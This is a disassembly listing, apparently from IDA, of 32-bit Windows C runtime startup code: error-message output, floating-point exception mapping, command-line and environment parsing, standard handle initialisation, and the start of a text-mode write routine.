loc_41B705: ; CODE XREF: sub_41B5C9+46�j
; sub_41B5C9+57�j
push edx
lea eax, [ebp+arg_0]
push eax
lea esi, off_42DFBC[esi]
push dword ptr [esi]
call sub_4179C0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_4201B4 ; GetStdHandle
push eax
call ds:dword_420040 ; WriteFile
loc_41B72A: ; CODE XREF: sub_41B5C9+38�j
; sub_41B5C9+63�j ...
lea esp, [ebp-118h]
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_41A1F6
pop edi
pop esi
pop ebx
leave
retn
sub_41B5C9 endp
; =============== S U B R O U T I N E =======================================
sub_41B740 proc near ; CODE XREF: sub_4162A0+9�p
; sub_4162C5+9�p
mov eax, dword_47C1F0
cmp eax, 1
jz short loc_41B757
test eax, eax
jnz short locret_41B778
cmp dword_42D7C4, 1
jnz short locret_41B778
loc_41B757: ; CODE XREF: sub_41B740+8�j
push 0FCh
call sub_41B5C9
mov eax, dword_47C370
test eax, eax
pop ecx
jz short loc_41B76D
call eax
loc_41B76D: ; CODE XREF: sub_41B740+29�j
push 0FFh
call sub_41B5C9
pop ecx
locret_41B778: ; CODE XREF: sub_41B740+C�j
; sub_41B740+15�j
retn
sub_41B740 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B779 proc near ; CODE XREF: .text:0041648D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_416E15
mov edi, [ebp+arg_0]
mov esi, eax
mov edx, [esi+54h]
mov eax, dword_42E0CC
mov ecx, edx
loc_41B794: ; CODE XREF: sub_41B779+2A�j
cmp [ecx], edi
jz short loc_41B7A5
lea ebx, [eax+eax*2]
add ecx, 0Ch
lea ebx, [edx+ebx*4]
cmp ecx, ebx
jb short loc_41B794
loc_41B7A5: ; CODE XREF: sub_41B779+1D�j
lea eax, [eax+eax*2]
lea eax, [edx+eax*4]
cmp ecx, eax
jnb short loc_41B7B3
cmp [ecx], edi
jz short loc_41B7B5
loc_41B7B3: ; CODE XREF: sub_41B779+34�j
xor ecx, ecx
loc_41B7B5: ; CODE XREF: sub_41B779+38�j
test ecx, ecx
jz loc_41B8CF
mov ebx, [ecx+8]
test ebx, ebx
mov [ebp+arg_0], ebx
jz loc_41B8CF
cmp ebx, 5
jnz short loc_41B7DC
and dword ptr [ecx+8], 0
xor eax, eax
inc eax
jmp loc_41B8D8
; ---------------------------------------------------------------------------
loc_41B7DC: ; CODE XREF: sub_41B779+55�j
cmp ebx, 1
jz loc_41B8CA
mov eax, [esi+58h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [esi+58h], eax
mov eax, [ecx+4]
cmp eax, 8
jnz loc_41B8BC
mov edx, dword_42E0C0
mov eax, dword_42E0C4
add eax, edx
cmp edx, eax
jge short loc_41B835
lea eax, [edx+edx*2]
shl eax, 2
loc_41B814: ; CODE XREF: sub_41B779+B7�j
mov edi, [esi+54h]
and dword ptr [eax+edi+8], 0
mov edi, dword_42E0C0
mov ebx, dword_42E0C4
inc edx
add ebx, edi
add eax, 0Ch
cmp edx, ebx
jl short loc_41B814
mov ebx, [ebp+arg_0]
loc_41B835: ; CODE XREF: sub_41B779+93�j
mov ecx, [ecx]
cmp ecx, 0C000008Eh
mov edi, [esi+5Ch]
jnz short loc_41B84B
mov dword ptr [esi+5Ch], 83h
jmp short loc_41B8AF
; ---------------------------------------------------------------------------
loc_41B84B: ; CODE XREF: sub_41B779+C7�j
cmp ecx, 0C0000090h
jnz short loc_41B85C
mov dword ptr [esi+5Ch], 81h
jmp short loc_41B8AF
; ---------------------------------------------------------------------------
loc_41B85C: ; CODE XREF: sub_41B779+D8�j
cmp ecx, 0C0000091h
jnz short loc_41B86D
mov dword ptr [esi+5Ch], 84h
jmp short loc_41B8AF
; ---------------------------------------------------------------------------
loc_41B86D: ; CODE XREF: sub_41B779+E9�j
cmp ecx, 0C0000093h
jnz short loc_41B87E
mov dword ptr [esi+5Ch], 85h
jmp short loc_41B8AF
; ---------------------------------------------------------------------------
loc_41B87E: ; CODE XREF: sub_41B779+FA�j
cmp ecx, 0C000008Dh
jnz short loc_41B88F
mov dword ptr [esi+5Ch], 82h
jmp short loc_41B8AF
; ---------------------------------------------------------------------------
loc_41B88F: ; CODE XREF: sub_41B779+10B�j
cmp ecx, 0C000008Fh
jnz short loc_41B8A0
mov dword ptr [esi+5Ch], 86h
jmp short loc_41B8AF
; ---------------------------------------------------------------------------
loc_41B8A0: ; CODE XREF: sub_41B779+11C�j
cmp ecx, 0C0000092h
jnz short loc_41B8AF
mov dword ptr [esi+5Ch], 8Ah
loc_41B8AF: ; CODE XREF: sub_41B779+D0�j
; sub_41B779+E1�j ...
push dword ptr [esi+5Ch]
push 8
call ebx
pop ecx
mov [esi+5Ch], edi
jmp short loc_41B8C3
; ---------------------------------------------------------------------------
loc_41B8BC: ; CODE XREF: sub_41B779+7E�j
and dword ptr [ecx+8], 0
push eax
call ebx
loc_41B8C3: ; CODE XREF: sub_41B779+141�j
mov eax, [ebp+var_4]
pop ecx
mov [esi+58h], eax
loc_41B8CA: ; CODE XREF: sub_41B779+66�j
or eax, 0FFFFFFFFh
jmp short loc_41B8D8
; ---------------------------------------------------------------------------
loc_41B8CF: ; CODE XREF: sub_41B779+3E�j
; sub_41B779+4C�j
push [ebp+arg_4]
call ds:dword_4201B8 ; UnhandledExceptionFilter
loc_41B8D8: ; CODE XREF: sub_41B779+5E�j
; sub_41B779+154�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B779 endp
; =============== S U B R O U T I N E =======================================
sub_41B8DD proc near ; CODE XREF: .text:00416445�p
cmp dword_47D9B4, 0
jnz short loc_41B8EB
call sub_41B11D
loc_41B8EB: ; CODE XREF: sub_41B8DD+7�j
push esi
mov esi, dword_47D9A4
test esi, esi
jnz short loc_41B8FD
mov esi, 420AEAh
jmp short loc_41B942
; ---------------------------------------------------------------------------
loc_41B8FD: ; CODE XREF: sub_41B8DD+17�j
mov al, [esi]
cmp al, 22h
jnz short loc_41B92B
inc esi
mov al, [esi]
cmp al, 22h
jz short loc_41B93B
loc_41B90A: ; CODE XREF: sub_41B8DD+45�j
test al, al
jz short loc_41B924
movzx eax, al
push eax
call sub_41E57D
test eax, eax
pop ecx
jz short loc_41B91D
inc esi
loc_41B91D: ; CODE XREF: sub_41B8DD+3D�j
inc esi
mov al, [esi]
cmp al, 22h
jnz short loc_41B90A
loc_41B924: ; CODE XREF: sub_41B8DD+2F�j
cmp byte ptr [esi], 22h
jnz short loc_41B93C
jmp short loc_41B93B
; ---------------------------------------------------------------------------
loc_41B92B: ; CODE XREF: sub_41B8DD+24�j
cmp al, 20h
jbe short loc_41B93C
loc_41B92F: ; CODE XREF: sub_41B8DD+56�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41B92F
jmp short loc_41B93C
; ---------------------------------------------------------------------------
loc_41B937: ; CODE XREF: sub_41B8DD+63�j
cmp al, 20h
ja short loc_41B942
loc_41B93B: ; CODE XREF: sub_41B8DD+2B�j
; sub_41B8DD+4C�j
inc esi
loc_41B93C: ; CODE XREF: sub_41B8DD+4A�j
; sub_41B8DD+50�j ...
mov al, [esi]
test al, al
jnz short loc_41B937
loc_41B942: ; CODE XREF: sub_41B8DD+1E�j
; sub_41B8DD+5C�j
mov eax, esi
pop esi
retn
sub_41B8DD endp
; =============== S U B R O U T I N E =======================================
sub_41B946 proc near ; CODE XREF: .text:loc_416414�p
push ebx
xor ebx, ebx
cmp dword_47D9B4, ebx
push esi
push edi
jnz short loc_41B958
call sub_41B11D
loc_41B958: ; CODE XREF: sub_41B946+B�j
mov esi, dword_47C1E8
xor edi, edi
cmp esi, ebx
jnz short loc_41B976
jmp short loc_41B996
; ---------------------------------------------------------------------------
loc_41B966: ; CODE XREF: sub_41B946+34�j
cmp al, 3Dh
jz short loc_41B96B
inc edi
loc_41B96B: ; CODE XREF: sub_41B946+22�j
push esi
call sub_4179C0
pop ecx
lea esi, [esi+eax+1]
loc_41B976: ; CODE XREF: sub_41B946+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_41B966
lea eax, ds:4[edi*4]
push eax
call sub_414E7D
mov edi, eax
cmp edi, ebx
pop ecx
mov dword_47C1C4, edi
jnz short loc_41B99B
loc_41B996: ; CODE XREF: sub_41B946+1E�j
or eax, 0FFFFFFFFh
jmp short loc_41B9F3
; ---------------------------------------------------------------------------
loc_41B99B: ; CODE XREF: sub_41B946+4E�j
mov esi, dword_47C1E8
push ebp
jmp short loc_41B9CE
; ---------------------------------------------------------------------------
loc_41B9A4: ; CODE XREF: sub_41B946+8A�j
push esi
call sub_4179C0
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_41B9CC
push ebp
call sub_414E7D
cmp eax, ebx
pop ecx
mov [edi], eax
jz short loc_41B9F7
push esi
push eax
call sub_419C40
pop ecx
pop ecx
add edi, 4
loc_41B9CC: ; CODE XREF: sub_41B946+6B�j
add esi, ebp
loc_41B9CE: ; CODE XREF: sub_41B946+5C�j
cmp [esi], bl
jnz short loc_41B9A4
push dword_47C1E8
call sub_414A14
mov dword_47C1E8, ebx
mov [edi], ebx
mov dword_47D9A8, 1
xor eax, eax
loc_41B9F1: ; CODE XREF: sub_41B946+C5�j
pop ecx
pop ebp
loc_41B9F3: ; CODE XREF: sub_41B946+53�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41B9F7: ; CODE XREF: sub_41B946+78�j
push dword_47C1C4
call sub_414A14
mov dword_47C1C4, ebx
or eax, 0FFFFFFFFh
jmp short loc_41B9F1
sub_41B946 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA0D proc near ; CODE XREF: sub_41BB79+54�p
; sub_41BB79+85�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_0], edx
push edi
mov [esi], edx
mov edi, ecx
mov dword ptr [ebx], 1
jz short loc_41BA30
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41BA30: ; CODE XREF: sub_41BA0D+18�j
; sub_41BA0D+65�j ...
cmp byte ptr [eax], 22h
jnz short loc_41BA43
xor ecx, ecx
test edx, edx
setz cl
inc eax
mov edx, ecx
mov cl, 22h
jmp short loc_41BA70
; ---------------------------------------------------------------------------
loc_41BA43: ; CODE XREF: sub_41BA0D+26�j
inc dword ptr [esi]
test edi, edi
jz short loc_41BA4E
mov cl, [eax]
mov [edi], cl
inc edi
loc_41BA4E: ; CODE XREF: sub_41BA0D+3A�j
mov cl, [eax]
movzx ebx, cl
inc eax
test byte_47C741[ebx], 4
jz short loc_41BA69
inc dword ptr [esi]
test edi, edi
jz short loc_41BA68
mov bl, [eax]
mov [edi], bl
inc edi
loc_41BA68: ; CODE XREF: sub_41BA0D+54�j
inc eax
loc_41BA69: ; CODE XREF: sub_41BA0D+4E�j
test cl, cl
mov ebx, [ebp+arg_4]
jz short loc_41BAA2
loc_41BA70: ; CODE XREF: sub_41BA0D+34�j
test edx, edx
jnz short loc_41BA30
cmp cl, 20h
jz short loc_41BA7E
cmp cl, 9
jnz short loc_41BA30
loc_41BA7E: ; CODE XREF: sub_41BA0D+6A�j
test edi, edi
jz short loc_41BA86
and byte ptr [edi-1], 0
loc_41BA86: ; CODE XREF: sub_41BA0D+73�j
; sub_41BA0D+96�j
and [ebp+var_4], 0
loc_41BA8A: ; CODE XREF: sub_41BA0D+157�j
cmp byte ptr [eax], 0
jz loc_41BB69
loc_41BA93: ; CODE XREF: sub_41BA0D+93�j
mov cl, [eax]
cmp cl, 20h
jz short loc_41BA9F
cmp cl, 9
jnz short loc_41BAA5
loc_41BA9F: ; CODE XREF: sub_41BA0D+8B�j
inc eax
jmp short loc_41BA93
; ---------------------------------------------------------------------------
loc_41BAA2: ; CODE XREF: sub_41BA0D+61�j
dec eax
jmp short loc_41BA86
; ---------------------------------------------------------------------------
loc_41BAA5: ; CODE XREF: sub_41BA0D+90�j
cmp byte ptr [eax], 0
jz loc_41BB69
cmp [ebp+arg_0], 0
jz short loc_41BABD
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41BABD: ; CODE XREF: sub_41BA0D+A5�j
inc dword ptr [ebx]
loc_41BABF: ; CODE XREF: sub_41BA0D+145�j
xor ebx, ebx
inc ebx
xor edx, edx
jmp short loc_41BAC8
; ---------------------------------------------------------------------------
loc_41BAC6: ; CODE XREF: sub_41BA0D+BE�j
inc eax
inc edx
loc_41BAC8: ; CODE XREF: sub_41BA0D+B7�j
cmp byte ptr [eax], 5Ch
jz short loc_41BAC6
cmp byte ptr [eax], 22h
jnz short loc_41BAF8
test dl, 1
jnz short loc_41BAF6
cmp [ebp+var_4], 0
jz short loc_41BAE9
lea ecx, [eax+1]
cmp byte ptr [ecx], 22h
jnz short loc_41BAE9
mov eax, ecx
jmp short loc_41BAEB
; ---------------------------------------------------------------------------
loc_41BAE9: ; CODE XREF: sub_41BA0D+CE�j
; sub_41BA0D+D6�j
xor ebx, ebx
loc_41BAEB: ; CODE XREF: sub_41BA0D+DA�j
xor ecx, ecx
cmp [ebp+var_4], ecx
setz cl
mov [ebp+var_4], ecx
loc_41BAF6: ; CODE XREF: sub_41BA0D+C8�j
shr edx, 1
loc_41BAF8: ; CODE XREF: sub_41BA0D+C3�j
test edx, edx
jz short loc_41BB09
loc_41BAFC: ; CODE XREF: sub_41BA0D+FA�j
test edi, edi
jz short loc_41BB04
mov byte ptr [edi], 5Ch
inc edi
loc_41BB04: ; CODE XREF: sub_41BA0D+F1�j
inc dword ptr [esi]
dec edx
jnz short loc_41BAFC
loc_41BB09: ; CODE XREF: sub_41BA0D+ED�j
mov cl, [eax]
test cl, cl
jz short loc_41BB57
cmp [ebp+var_4], 0
jnz short loc_41BB1F
cmp cl, 20h
jz short loc_41BB57
cmp cl, 9
jz short loc_41BB57
loc_41BB1F: ; CODE XREF: sub_41BA0D+106�j
test ebx, ebx
jz short loc_41BB51
test edi, edi
jz short loc_41BB40
movzx edx, cl
test byte_47C741[edx], 4
jz short loc_41BB39
mov [edi], cl
inc edi
inc eax
inc dword ptr [esi]
loc_41BB39: ; CODE XREF: sub_41BA0D+124�j
mov cl, [eax]
mov [edi], cl
inc edi
jmp short loc_41BB4F
; ---------------------------------------------------------------------------
loc_41BB40: ; CODE XREF: sub_41BA0D+118�j
movzx ecx, cl
test byte_47C741[ecx], 4
jz short loc_41BB4F
inc eax
inc dword ptr [esi]
loc_41BB4F: ; CODE XREF: sub_41BA0D+131�j
; sub_41BA0D+13D�j
inc dword ptr [esi]
loc_41BB51: ; CODE XREF: sub_41BA0D+114�j
inc eax
jmp loc_41BABF
; ---------------------------------------------------------------------------
loc_41BB57: ; CODE XREF: sub_41BA0D+100�j
; sub_41BA0D+10B�j ...
test edi, edi
jz short loc_41BB5F
and byte ptr [edi], 0
inc edi
loc_41BB5F: ; CODE XREF: sub_41BA0D+14C�j
inc dword ptr [esi]
mov ebx, [ebp+arg_4]
jmp loc_41BA8A
; ---------------------------------------------------------------------------
loc_41BB69: ; CODE XREF: sub_41BA0D+80�j
; sub_41BA0D+9B�j
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41BB73
and dword ptr [eax], 0
loc_41BB73: ; CODE XREF: sub_41BA0D+161�j
inc dword ptr [ebx]
pop edi
pop ebx
leave
retn
sub_41BA0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB79 proc near ; CODE XREF: .text:00416403�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp dword_47D9B4, edi
jnz short loc_41BB90
call sub_41B11D
loc_41BB90: ; CODE XREF: sub_41BB79+10�j
and byte_47C47C, 0
push 104h
mov esi, offset dword_47C378
push esi
push edi
call ds:dword_420010 ; GetModuleFileNameA
mov eax, dword_47D9A4
cmp eax, edi
mov dword_47C1D4, esi
jz short loc_41BBBF
cmp byte ptr [eax], 0
mov ebx, eax
jnz short loc_41BBC1
loc_41BBBF: ; CODE XREF: sub_41BB79+3D�j
mov ebx, esi
loc_41BBC1: ; CODE XREF: sub_41BB79+44�j
lea eax, [ebp+var_4]
push eax
push edi
lea esi, [ebp+var_8]
xor ecx, ecx
mov eax, ebx
call sub_41BA0D
mov esi, [ebp+var_4]
mov eax, [ebp+var_8]
shl esi, 2
add eax, esi
push eax
call sub_414E7D
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_41BBF1
or eax, 0FFFFFFFFh
jmp short loc_41BC16
; ---------------------------------------------------------------------------
loc_41BBF1: ; CODE XREF: sub_41BB79+71�j
lea eax, [ebp+var_4]
push eax
lea ecx, [esi+edi]
push edi
lea esi, [ebp+var_8]
mov eax, ebx
call sub_41BA0D
mov eax, [ebp+var_4]
dec eax
pop ecx
mov dword_47C1B8, eax
pop ecx
mov dword_47C1BC, edi
xor eax, eax
loc_41BC16: ; CODE XREF: sub_41BB79+76�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BB79 endp
; =============== S U B R O U T I N E =======================================
sub_41BC1B proc near ; CODE XREF: .text:004163F9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_47C480
push ebx
push ebp
push esi
push edi
mov edi, ds:dword_4201C8
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_41BC64
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41BC4B
mov dword_47C480, 1
jmp short loc_41BC69
; ---------------------------------------------------------------------------
loc_41BC4B: ; CODE XREF: sub_41BC1B+22�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41BC5F
mov eax, ebp
mov dword_47C480, eax
jmp short loc_41BC64
; ---------------------------------------------------------------------------
loc_41BC5F: ; CODE XREF: sub_41BC1B+39�j
mov eax, dword_47C480
loc_41BC64: ; CODE XREF: sub_41BC1B+1A�j
; sub_41BC1B+42�j
cmp eax, 1
jnz short loc_41BCE6
loc_41BC69: ; CODE XREF: sub_41BC1B+2E�j
cmp esi, ebx
jnz short loc_41BC75
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41BCEE
loc_41BC75: ; CODE XREF: sub_41BC1B+50�j
cmp [esi], bx
mov eax, esi
jz short loc_41BC8A
loc_41BC7C: ; CODE XREF: sub_41BC1B+66�j
; sub_41BC1B+6D�j
add eax, ebp
cmp [eax], bx
jnz short loc_41BC7C
add eax, ebp
cmp [eax], bx
jnz short loc_41BC7C
loc_41BC8A: ; CODE XREF: sub_41BC1B+5F�j
mov edi, ds:dword_4200D8
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41BCDB
push ebp
call sub_414E7D
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_41BCDB
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41BCD7
push [esp+18h+var_8]
call sub_414A14
pop ecx
mov [esp+18h+var_8], ebx
loc_41BCD7: ; CODE XREF: sub_41BC1B+AC�j
mov ebx, [esp+18h+var_8]
loc_41BCDB: ; CODE XREF: sub_41BC1B+8C�j
; sub_41BC1B+9B�j
push esi
call ds:dword_4201C4 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41BD36
; ---------------------------------------------------------------------------
loc_41BCE6: ; CODE XREF: sub_41BC1B+4C�j
cmp eax, ebp
jz short loc_41BCF2
cmp eax, ebx
jz short loc_41BCF2
loc_41BCEE: ; CODE XREF: sub_41BC1B+58�j
; sub_41BC1B+E1�j
xor eax, eax
jmp short loc_41BD36
; ---------------------------------------------------------------------------
loc_41BCF2: ; CODE XREF: sub_41BC1B+CD�j
; sub_41BC1B+D1�j
call ds:dword_4201C0 ; GetEnvironmentStringsA
mov esi, eax
cmp esi, ebx
jz short loc_41BCEE
cmp [esi], bl
jz short loc_41BD0C
loc_41BD02: ; CODE XREF: sub_41BC1B+EA�j
; sub_41BC1B+EF�j
inc eax
cmp [eax], bl
jnz short loc_41BD02
inc eax
cmp [eax], bl
jnz short loc_41BD02
loc_41BD0C: ; CODE XREF: sub_41BC1B+E5�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_414E7D
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_41BD22
xor edi, edi
jmp short loc_41BD2D
; ---------------------------------------------------------------------------
loc_41BD22: ; CODE XREF: sub_41BC1B+101�j
push ebp
push esi
push edi
call sub_419140
add esp, 0Ch
loc_41BD2D: ; CODE XREF: sub_41BC1B+105�j
push esi
call ds:dword_4201BC ; FreeEnvironmentStringsA
mov eax, edi
loc_41BD36: ; CODE XREF: sub_41BC1B+C9�j
; sub_41BC1B+D5�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41BC1B endp
; =============== S U B R O U T I N E =======================================
sub_41BD3D proc near ; CODE XREF: .text:004163DD�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 48h
push ebx
mov ebx, 480h
push ebx
call sub_414E7D
test eax, eax
pop ecx
jnz short loc_41BD59
or eax, 0FFFFFFFFh
jmp loc_41BF36
; ---------------------------------------------------------------------------
loc_41BD59: ; CODE XREF: sub_41BD3D+12�j
mov dword_47C620, eax
mov dword_47C618, 20h
lea ecx, [eax+480h]
jmp short loc_41BD8E
; ---------------------------------------------------------------------------
loc_41BD70: ; CODE XREF: sub_41BD3D+53�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, dword_47C620
add eax, 24h
add ecx, 480h
loc_41BD8E: ; CODE XREF: sub_41BD3D+31�j
cmp eax, ecx
jb short loc_41BD70
push ebp
push esi
push edi
lea eax, [esp+58h+var_44]
push eax
call ds:dword_420164 ; GetStartupInfoA
cmp word ptr [esp+58h+var_14+2], 0
jz loc_41BE95
mov eax, [esp+58h+var_10]
test eax, eax
jz loc_41BE95
mov edi, [eax]
lea ebp, [eax+4]
lea eax, [edi+ebp]
mov [esp+58h+var_48], eax
mov eax, 800h
cmp edi, eax
jl short loc_41BDCF
mov edi, eax
loc_41BDCF: ; CODE XREF: sub_41BD3D+8E�j
cmp dword_47C618, edi
jge short loc_41BE25
mov esi, offset dword_47C624
loc_41BDDC: ; CODE XREF: sub_41BD3D+DE�j
push ebx
call sub_414E7D
test eax, eax
pop ecx
jz short loc_41BE1F
add dword_47C618, 20h
mov [esi], eax
lea ecx, [eax+480h]
jmp short loc_41BE0E
; ---------------------------------------------------------------------------
loc_41BDF8: ; CODE XREF: sub_41BD3D+D3�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [esi]
add eax, 24h
add ecx, ebx
loc_41BE0E: ; CODE XREF: sub_41BD3D+B9�j
cmp eax, ecx
jb short loc_41BDF8
add esi, 4
cmp dword_47C618, edi
jl short loc_41BDDC
jmp short loc_41BE25
; ---------------------------------------------------------------------------
loc_41BE1F: ; CODE XREF: sub_41BD3D+A8�j
mov edi, dword_47C618
loc_41BE25: ; CODE XREF: sub_41BD3D+98�j
; sub_41BD3D+E0�j
xor ebx, ebx
test edi, edi
jle short loc_41BE95
loc_41BE2B: ; CODE XREF: sub_41BD3D+156�j
mov eax, [esp+58h+var_48]
mov eax, [eax]
cmp eax, 0FFFFFFFFh
jz short loc_41BE8A
mov cl, [ebp+0]
test cl, 1
jz short loc_41BE8A
test cl, 8
jnz short loc_41BE4E
push eax
call ds:dword_4201D0 ; GetFileType
test eax, eax
jz short loc_41BE8A
loc_41BE4E: ; CODE XREF: sub_41BD3D+104�j
mov ecx, ebx
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
sar ecx, 5
mov ecx, dword_47C620[ecx*4]
lea esi, [ecx+eax*4]
mov eax, [esp+58h+var_48]
mov eax, [eax]
mov [esi], eax
mov al, [ebp+0]
mov [esi+4], al
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41D188
test eax, eax
pop ecx
pop ecx
jz short loc_41BEB5
inc dword ptr [esi+8]
loc_41BE8A: ; CODE XREF: sub_41BD3D+F7�j
; sub_41BD3D+FF�j ...
add [esp+58h+var_48], 4
inc ebx
inc ebp
cmp ebx, edi
jl short loc_41BE2B
loc_41BE95: ; CODE XREF: sub_41BD3D+69�j
; sub_41BD3D+75�j ...
xor ebx, ebx
loc_41BE97: ; CODE XREF: sub_41BD3D+1E2�j
mov ecx, dword_47C620
lea eax, [ebx+ebx*8]
lea esi, [ecx+eax*4]
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_41BF17
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41BEBA
push 0FFFFFFF6h
pop eax
jmp short loc_41BEC4
; ---------------------------------------------------------------------------
loc_41BEB5: ; CODE XREF: sub_41BD3D+148�j
; sub_41BD3D+1CD�j
or eax, 0FFFFFFFFh
jmp short loc_41BF33
; ---------------------------------------------------------------------------
loc_41BEBA: ; CODE XREF: sub_41BD3D+171�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41BEC4: ; CODE XREF: sub_41BD3D+176�j
push eax
call ds:dword_4201B4 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41BF11
push edi
call ds:dword_4201D0 ; GetFileType
test eax, eax
jz short loc_41BF11
and eax, 0FFh
cmp eax, 2
mov [esi], edi
jnz short loc_41BEEF
or byte ptr [esi+4], 40h
jmp short loc_41BEF8
; ---------------------------------------------------------------------------
loc_41BEEF: ; CODE XREF: sub_41BD3D+1AA�j
cmp eax, 3
jnz short loc_41BEF8
or byte ptr [esi+4], 8
loc_41BEF8: ; CODE XREF: sub_41BD3D+1B0�j
; sub_41BD3D+1B5�j
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41D188
test eax, eax
pop ecx
pop ecx
jz short loc_41BEB5
inc dword ptr [esi+8]
jmp short loc_41BF1B
; ---------------------------------------------------------------------------
loc_41BF11: ; CODE XREF: sub_41BD3D+193�j
; sub_41BD3D+19E�j
or byte ptr [esi+4], 40h
jmp short loc_41BF1B
; ---------------------------------------------------------------------------
loc_41BF17: ; CODE XREF: sub_41BD3D+169�j
or byte ptr [esi+4], 80h
loc_41BF1B: ; CODE XREF: sub_41BD3D+1D2�j
; sub_41BD3D+1D8�j
inc ebx
cmp ebx, 3
jl loc_41BE97
push dword_47C618
call ds:dword_4201CC ; SetHandleCount
xor eax, eax
loc_41BF33: ; CODE XREF: sub_41BD3D+17B�j
pop edi
pop esi
pop ebp
loc_41BF36: ; CODE XREF: sub_41BD3D+17�j
pop ebx
add esp, 48h
retn
sub_41BD3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BF3B proc near ; CODE XREF: sub_41C0E0+52�p
; sub_41E66E+91�p
var_420 = byte ptr -420h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 420h
mov eax, dword_42DEA8
xor eax, [ebp+4]
push edi
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+var_14], edi
mov [ebp+var_18], edi
jnz short loc_41BF64
xor eax, eax
jmp loc_41C0D2
; ---------------------------------------------------------------------------
loc_41BF64: ; CODE XREF: sub_41BF3B+20�j
mov eax, [ebp+arg_0]
push ebx
mov ebx, [ebp+arg_0]
and eax, 1Fh
sar ebx, 5
push esi
lea esi, [eax+eax*8]
lea ebx, ds:47C620h[ebx*4]
mov eax, [ebx]
shl esi, 2
test byte ptr [eax+esi+4], 20h
jz short loc_41BF97
push 2
push edi
push edi
push [ebp+arg_0]
call sub_41E58E
add esp, 10h
loc_41BF97: ; CODE XREF: sub_41BF3B+4B�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41C069
cmp [ebp+arg_8], edi
mov eax, [ebp+arg_4]
mov [ebp+var_10], eax
mov [ebp+var_8], edi
jbe loc_41C0A4
loc_41BFB7: ; CODE XREF: sub_41BF3B+F3�j
mov ecx, [ebp+var_10]
sub ecx, [ebp+arg_4]
lea eax, [ebp+var_420]
mov [ebp+var_C], edi
loc_41BFC6: ; CODE XREF: sub_41BF3B+B5�j
cmp ecx, [ebp+arg_8]
jnb short loc_41BFF2
mov edx, [ebp+var_10]
inc [ebp+var_10]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_41BFE3
inc [ebp+var_18]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+var_C]
loc_41BFE3: ; CODE XREF: sub_41BF3B+9C�j
mov [eax], dl
inc eax
inc [ebp+var_C]
cmp [ebp+var_C], 400h
jl short loc_41BFC6
